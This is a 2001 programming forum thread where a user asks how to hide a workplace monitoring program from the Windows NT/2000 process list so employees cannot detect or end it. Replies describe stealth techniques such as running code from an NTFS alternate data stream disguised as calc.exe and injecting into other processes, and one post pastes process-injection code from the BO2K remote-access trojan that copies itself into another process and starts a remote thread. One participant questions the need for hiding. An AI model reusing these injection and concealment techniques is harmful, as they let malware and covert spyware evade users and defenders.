Announcement

Collapse
No announcement yet.

Hide App In Process List in NT / w2k?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Michael Mattias
    replied
    .. it keeps the user (who is being monitored) from using the Windows Task Manager to end-task the program that is doing the monitoring. In fact it makes it so that the program can't be easily detected by the user in the first place.
    OK, now I understand. The "time" considerations are indirect. The real challenge is preventing unauthorized task termination!

    I knew there had to be some kind of reason.

    MCM

    Leave a comment:


  • Gregery D Engle
    replied
    Thanks Eric!

    ------------------
    -Greg

    Leave a comment:


  • Eric Pearson
    replied
    > What does hiding a process from the task list
    > have to do with logging the time spent using
    > that process?

    Nothing, at least not directly. But it keeps the user (who is being monitored) from using the Windows Task Manager to end-task the program that is doing the monitoring. In fact it makes it so that the program can't be easily detected by the user in the first place.

    -- Eric


    ------------------
    Perfect Sync Development Tools
    Perfect Sync Web Site
    Contact Us: mailto:[email protected][email protected]</A>

    Leave a comment:


  • Michael Mattias
    replied
    I seem confused. How does trapping WM_SETFOCUS and WM_KILLFOCUS
    on my app track usage on all apps on users work station?
    Well, you've confused me. You said,
    well my app is for Management audting, they want to see how much
    time each window is active for a given user...
    There's a difference between how much time one spends in window (which I interpreted as "time spent in any given window of a given application" and how much time users spend in any given application of a suite of different applications.

    To answer your question, trapping messages in any one application does nothing for logging time across multiple applications.

    FIWI, there's probably some "hook process" method to trap messages across applications, though.

    But I digress ... or do I? What does hiding a process from the task list have to do with logging the time spent using that process?

    MCM

    Leave a comment:


  • Gregery D Engle
    replied
    Michael,

    I seem confused. How does trapping WM_SETFOCUS and WM_KILLFOCUS
    on my app track usage on all apps on users work station?

    Getting the time is the easy part, I just need help hiding
    the app from the process list in NT.

    ------------------
    -Greg

    [This message has been edited by Gregery D Engle (edited October 15, 2001).]

    Leave a comment:


  • Michael Mattias
    replied
    well my app is for Management audting, they want to see how much
    time each window is active for a given user. They don't want
    the user trying to end the task though.
    How does keeping a process off the task list aid this?

    Besides, you can track how much time a user spends in each Window easily enough by trapping the WM_SETFOCUS and WM_KILLFOCUS messages.

    MCM


    Leave a comment:


  • Gregery D Engle
    replied
    well my app is for Management audting, they want to see how much
    time each window is active for a given user. They don't want
    the user trying to end the task though.

    ------------------
    -Greg

    Leave a comment:


  • Michael Mattias
    replied
    I just gotta ask:

    Why hide the process from the task list at all?

    In fact, why even hide the process from the task bar?

    My view: If it's a process, let it behave like a process, for crying out loud.

    If you don't want to spawn a second process, put it in a separate thread of execution!

    (I'm sure someone will give me a reasonable explanation of this penchant for hiding things).

    MCM


    Leave a comment:


  • Wayne Diamond
    replied
    I know just enough C++ to install Visual Studio, sorry I can't help more with that

    ------------------

    Leave a comment:


  • Gregery D Engle
    replied
    Sven,

    Anyhelp in converting to PB? Haven't programmed in C++ since
    high school.

    ------------------
    -Greg

    Leave a comment:


  • Wayne Diamond
    replied
    But... but... its C++


    [This message has been edited by Wayne Diamond (edited October 15, 2001).]

    Leave a comment:


  • Sven Blumenstein
    replied
    From www.sourceforge.net/projects/bo2k
    Code:
    if(g_bIsWinNT) {  //---------------------- WINDOWS NT PROCESS HIDE -------------------
    		// -------------------------------------------------------
    		// -- Process Hiding Code                               
    		// -- Note that there are several different ways to do  
    		// -- what this code does. Both of the methods presented
    		// -- below were written specifically to avoid accessing
    		// -- the original BO2K image on disk.
    		// -- This way, the original BO2K disk file can be compressed
    		// -- with all of the plugin attachments inside, and
    		// -- the original executable can be moved around/deleted
    		// -- while the BO2K server still runs.
    		
    		// Get another process and thread id
    		PROCESSINFO *ppie,*ppi=CreateProcListSnapshot(NULL);
    		DWORD dwThreadID, dwProcID;
    		
    		for(ppie=ppi;ppie!=NULL;ppie=ppie->next) {
    			if(lstrcmpi(ppie->svApp,svProcess)==0) break;
    		}
    		if(ppie==NULL) return FALSE;
    		
    		dwProcID=ppie->dwProcID;
    		dwThreadID=ppie->pThread->dwThreadID; // Get first thread (doesn't really matter)
    		
    		DestroyProcListSnapshot(ppi);
    		
    		// Make sure we aren't hopping into ourselves
    		if(GetCurrentProcessId()==dwProcID) return FALSE;
    
    		// Open process to inject code into
    		HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcID);
    		if(hProc==NULL) {
    			DebugMessageBox(NULL,"Unable to open process","ERROR",MB_SETFOREGROUND);
    			return FALSE;
    		}
    		
    		// Free space for BO2K (in case we are restarting)
    		pVirtualFreeEx(hProc,g_module,0,MEM_RELEASE);
    		
    		// Allocate space for BO2K to fit in the process
    		DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(g_module))->SizeOfImage;
    		char *pMem=(char *)pVirtualAllocEx(hProc,g_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    		if(pMem==NULL) {
    			DebugMessageBox(NULL,"Couldn't VirtualAllocEx","Error",MB_SETFOREGROUND);
    			return FALSE;
    		}
    		
    		// Lets copy the entire bo2k process into this space.
    		DWORD dwOldProt,dwNumBytes,i;
    		MEMORY_BASIC_INFORMATION mbi;
    		
    		pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
    		while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
    			if(!(mbi.Protect & PAGE_GUARD)) {
    				for(i=0;i<mbi.RegionSize;i+=0x1000) {
    					pVirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt);
    					WriteProcessMemory(hProc,pMem+i,pMem+i,0x1000,&dwNumBytes);
    				}
    			}
    			
    			pMem+=mbi.RegionSize;
    			pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));	
    		}
    		
    		// Create a remote thread in the other process
    		DWORD dwRmtThdID;
    		HANDLE hRmtThd=pCreateRemoteThread(hProc,NULL,0,EntryPoint,(LPVOID)g_module,0,&dwRmtThdID);
    		if(hRmtThd==NULL) {
    			DebugMessageBox(NULL,"Could create remote thread","ERROR",MB_SETFOREGROUND);
    			return FALSE;
    		}
    		
    		CloseHandle(hProc);
    		return 0;
    ------------------
    Sven Blumenstein
    IT-Trainee at DECOMA Exterior Systems, Germany
    E-Mail: mailto:[email protected][NOSPAM]cycos.net[email protected][NOSPAM]cycos.net</A>
    Programming with: PB/DLL, MASM, VB, VC++, LCC, VBA, WML

    Leave a comment:


  • Wayne Diamond
    replied
    You can use RegisterServiceProcess to hide it from the Task List, but you cant hide from the Process List as such - at least, not if youre a running process
    but have a look through Semen's posts, he's written a couple of amazing DLLs that inject into already-running processes. You could also make a DLL that is loaded by a system process, but that may also be tricky. Another option is to make a base service provider - eg. DLLs registered with Regsvr32.exe, theyre always running but never show in the process list
    in Win98 you can 'patch' the Toolhelp APIs to render your process hidden, but it cant be applied to NT/2K
    One thing you can do however, is to run your program from a stream. For example, copy it across to c:\winnt\calc.exe:mystream
    Youve got two files in one - calc.exe (MS Calc), and calc.exe:mystream (your prog). You cant use Start | Run to execute streams, but you can do it programmatically using a call to ShellExecute()
    Then look at your process list - you'll just see "calc.exe" but you wont see "calc.exe:mystream", even though that's what is actually running. This is only a visual deception though, as the process list APIs still reveal the full path, its just that Task Manager for some reason chooses to ignore the stream segment of the filename

    Best of luck!
    Wayne


    ------------------

    Leave a comment:


  • Gregery D Engle
    started a topic Hide App In Process List in NT / w2k?

    Hide App In Process List in NT / w2k?

    Anyone know how? I don't want the process to show at all.

    ------------------
    -Greg
Working...
X